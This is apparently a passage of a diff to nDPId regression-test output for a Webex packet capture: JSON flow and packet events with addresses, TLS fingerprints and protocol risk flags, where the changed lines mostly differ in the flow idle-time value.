-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570719041,"flow_last_seen":1444570719041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570719041,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1444570719041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570719041,"pkt":"ABoRAAACABoRAAABCABFAAA8mB5AAEAGdIkKCAABPm3lnsqTAbu3\/XtaAAAAAKACOQj9rAAAAgQFtAQCCAoATONEAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1444570719047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570719047,"pkt":"ABoRAAACABoRAAABCABFAAAoA+JAABAGONo+beWeCggAAQG7ypNIAoSlt\/17W1AS\/\/+1bgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570720045,"pkt":"ABoRAAACABoRAAABCABFAAAoAABAAEAGDLwKCAABPm3lnsqTAbu3\/XtbAAAAAFAEAACCJAAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570732086,"flow_last_seen":1444570732086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570732086,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738419,"flow_last_seen":1444570738419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738419,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1444570738419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738419,"pkt":"ABoRAAACABoRAAABCABFAAA8eOlAAEAGmOQKCAABPm3geMf7AbvAYZI1AAAAAKACOQjekwAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 